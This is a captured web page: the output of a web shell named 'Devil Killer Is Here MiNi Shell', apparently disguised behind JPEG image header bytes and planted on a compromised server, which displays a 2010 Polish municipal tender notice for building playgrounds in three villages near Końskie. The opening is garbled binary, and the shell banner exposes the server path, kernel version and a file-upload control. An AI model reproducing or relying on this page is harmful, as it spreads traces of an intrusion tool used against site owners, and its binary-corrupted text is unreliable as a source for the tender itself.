JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/213279-N-2010.html

<p class="kh_header"><b>Końskie: Zadanie nr 1 Budowa placu zabaw w miejscowości Brody
i/lub
Zadanie nr 2 Budowa placu zabaw w miejscowości Sierosławice 
i/lub
Zadanie nr 3 Budowa placu zabaw w miejscowości Górny Młyn</b><br>
<b>Numer ogłoszenia: 213279 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskie , ul. Partyzantów 1/24, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3723249, 3723720, faks 041 3722955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umkonskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1 Budowa placu zabaw w miejscowości Brody
i/lub
Zadanie nr 2 Budowa placu zabaw w miejscowości Sierosławice 
i/lub
Zadanie nr 3 Budowa placu zabaw w miejscowości Górny Młyn.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: 
Zadanie nr 1 budowa placu zabaw w miejscowości Brody zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:

-Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw Ancymon 7 PRO - 1 szt. z drewna impregnowanego ciśnieniowo o wymiarach belki 
o średnicy 120 mm. 
Wymiary zestawu:  9,10 x 8,60 m w skład którego wchodzi: 
            - zjeżdżalnia 
- zjeżdżalnia mała
- 3 wieże główne
- drabinka do wieży 
- pomost niski
- pomost średni 
- pomost skośny krótki
- przeplotnia sznurowa 
- drabinka skośna
- pomost z belką
- pomost wiszący 
- belka z uchwytami 
- ścianka wspinaczkowa dwunarożnikowa niska
Wymiary strefy bezpieczeństwa: 11,10 x 10,40 m i wysokość zestawu 3,30 m. 

- 	1 szt. sprężynowiec Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 4,20 m, wysokość 0,50 m;
- 	4 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
- 	1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

-Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową o szerokości 3,0 m i furtką szerokości 1,0 m. Wymiary ogrodzenia szer. 14,0 
dl. 20,5 m;

-Humusowanie oraz obsianie całością trawą. 

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa


Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
	będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
	będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa 
i wysokości upadku;
	będą posiadały certyfikaty bezpieczeństwa;
	będą zgodne z dopuszczającymi do użytku normami. 

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Szczegóły określa również przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca.


i/lub

Zadanie nr 2 budowa placu zabaw w miejscowości Sierosławice zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:
-Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw OGR 3 - 1 szt z drewna bezrdzeniowego o przekroju 95 x 95 mm i wymiarach 
9,50 x 5,70 m w skład którego wchodzi 
- zjeżdżalnia 
- pomost 
- wieża z dachem 
- wejście trójkątne
- wejście schody 
- pomost wiszący
- ścianka wspinaczkowa 
- ścianka wspinaczkowa narożna
- przejście rurowe
- przeplotnia
- drabinka pozioma i sznurowa

Wymiary strefy bezpieczeństwa: 12,50 x 7,70 m, wysokość zestawu 3,10 m.

	1 szt. sprężynowiec  Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 3,00 m, wysokość 0,50 m.;
	4 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

-Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową o szerokości 3,0 m i furtką szerokości 1,0 m. Wymiary ogrodzenia szer. 35,0 dł. 21 m.

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa i wysokości upadku;
	będą posiadały certyfikaty bezpieczeństwa;
	będą zgodne z dopuszczającymi do użytku normami. 

Szczegóły określa również  przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca

i/lub

Zadanie nr 3 budowa placu zabaw w miejscowości Górny Młyn zgodnie z projektem zagospodarowania terenu działki, zakres prac obejmuje:

Dostawa i montaż na istniejącej nawierzchni trawiastej urządzeń zabawowych Croquet lub równoważnych:
Zestaw OGR 3 - 1 szt. z drewna bezrdzeniowego o przekroju 95 x 95 mm i wymiarach 9,50 x 5,70 m w skład którego wchodzi 
-zjeżdżalnia 
-pomost
-wieża z dachem
-wejście trójkątne
-wejście schody  
-pomost wiszący
-ścianka wspinaczkowa
-ścianka wspinaczkowa narożna 
-przejście rurowe 
-przeplotnia,
-drabinka pozioma i sznurowa
 
Wymiary strefy bezpieczeństwa: 12,50 x 7,70 m, wysokość zestawu 3,10 m.

1 szt.- sprężynowiec Gepard o wymiarach do 1,20 x 0,65 m i strefie bezpieczeństwa 3,00 m, wysokość 0,50 m.;
	2 szt. ławek drewnianych z oparciem, montowane na stałe o wymiarach całkowitych 1,70 x 0,60 m;
	1 szt. huśtawka wagowa grupa OT - Koniki o wymiarach 3,00 x 0,40 m, wymiary strefy bezpieczeństwa: 5,00 x 2,40 m, wysokość: 0,50 m.

Montaż ogrodzenia o wysokości 1,0 m o rozstawie słupów stalowych 2,4 m wraz z bramą wjazdową  i furtką. 

Wykonanie chodnika z kostki brukowej o łącznej powierzchni 30 m2.

Wszystkie urządzenia zamontowane powinny posiadać odpowiednie atesty, deklaracje zgodności i certyfikaty na znak bezpieczeństwa

Wykonawca może wykorzystać równoważne elementy wyposażenia innych firm niż podane w dokumentacji. Za równoważne uważa się produkty posiadające następujące cechy:
	będą tożsame pod względem materiałowym, rodzaju impregnacji i zabezpieczeń antykorozyjnych;
	będą tożsame pod względem formy i kolorystyki;
	będą tożsame pod względem parametrów wielkościowych, pół bezpieczeństwa 
i wysokości upadku;
będą posiadały certyfikaty bezpieczeństwa;
będą zgodne z dopuszczającymi do użytku normami. 

Szczegóły określa również przedmiar robót który stanowi materiał pomocniczy
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej realizacji prac celem sprawdzenia warunków związanych z wykonaniem prac będący przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 37.53.52.00-9, 45.34.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W prowadzonym postępowaniu wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku posiadania wiedzy i doświadczenia 
 Wykonawca winien wskazać że wykonał w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej dwie roboty budowlane, które odpowiadają swoim rodzajem i wartością przedmiotowi niniejszego zamówienia.
Podstawą oceny spełnienia warunku, o których mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi 
do wykonania zamówienia
 - Wykonawca winien wykazać, osoby które będą uczestniczyć w realizacji zamówienia posiadające niezbędne uprawnienia w tym co najmniej jedna osoba posiadająca uprawnienia konstrukcyjno-budowlane
Podstawą oceny spełnienia warunku, o którym mowa powyżej będą w szczególności dokumenty i oświadczenia wymagane w pkt 2 specyfikacji istotnych warunków zamówienia, złożone w trakcie postępowania, na zasadzie  spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) prospekty, materiały reklamowe, zdjęcia elementów placu zabaw wraz z danymi technicznymi
b) oświadczenia mówiące o tym, że proponowane przez Wykonawców urządzenia posiadają aktualne certyfikaty upoważniające do oznaczenia wyrobu znakiem bezpieczeństwa wg wzoru stanowiący załącznik nr 5 do SIWZ</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony i podpisany FORMULARZ OFERTOWY, którego wzorzec przedstawiono w rozdziale D niniejszej specyfikacji istotnych warunków zamówienia
b)  Jeżeli wykonawca będzie polegał na wiedzy i doświadczeniu, osobach zdolnych 
do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia. W tym celu musi w szczególności przedstawić pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia 
c) kosztorys ofertowy- ze względu na ryczałtowy charakter wynagrodzenia kosztorys ofertowy ma charakter pomocniczy wszelkie w błędy wynikające z w/w dokumentu nie będą miały wpływu na ocenę oferty
d)  Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik, lub w przypadku wykonawców składających ofertę wspólną. Forma pełnomocnictwa: oryginał lub kopia poświadczona przez notariusza.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy stosunku 
do treści oferty w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia.
1.	Zmiana sposobu spełnienia świadczenia:
a)	zmiana przedstawicieli uczestników procesu inwestycyjnego. 
1.1.	Pozostałe zmiany:
a)	Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	Zmiana obowiązującej stawki VAT Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie wykonawcy Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę różnicy w kwocie podatku zapłaconego przez wykonawcze;
c)	Rezygnacja przez zamawiającego z realizacji części przedmiotu umowy. 
W takim przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone;
d)	Ewentualne wyłączenia robót, realizowane będą na podstawie zatwierdzonych przez Zamawiającego protokołów konieczności; 
e)	Za roboty wyłączone, strony ustalają wynagrodzenie na podstawie zatwierdzonego przez Zamawiającego kosztorysu sporządzonego przez Wykonawcę z zastosowaniem cen jednostkowych i wskaźników, określonych w kosztorysie ofertowym, sprawdzonego przez Koordynatora;
f)	Dopuszcza się zmiany harmonogramu rzeczowo-finansowego jeżeli jest to konieczne do właściwej realizacji umowy  pod warunkiem, że nie spowodują zmiany terminu realizacji umowy.
1.2.	Zmiana terminu zakończenia realizacji przedmiotu umowy wskutek okoliczności których nie było przewidzieć w chwili zawarcia umowy,
Wystąpienie zamówień dodatkowych niezbędnych do prawidłowego wykonania realizowanego zamówienia
2.	Zmiany niniejszej umowy o których mowa powyżej oraz nieistotne zmiany umowy wymagają pisemnego aneksu pod rygorem nieważności i nie mogą być sprzeczne z postanowieniami ustawy z dnia 29.01.2004r. Prawo Zamówień Publicznych w szczególności z jej art. 144.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umkonskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Końskie
ul. Partyzantów 1
26-200 końskie pok. 37.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 09:00, miejsce: Urząd Miasta i Gminy Końskie
ul. Partyzantów 1
26-200 końskie pok. 24 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie nr 1,2,3 Wdrażanie Lokalnych Strategii Rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Budowa placu zabaw w miejscowości Brody.</p>
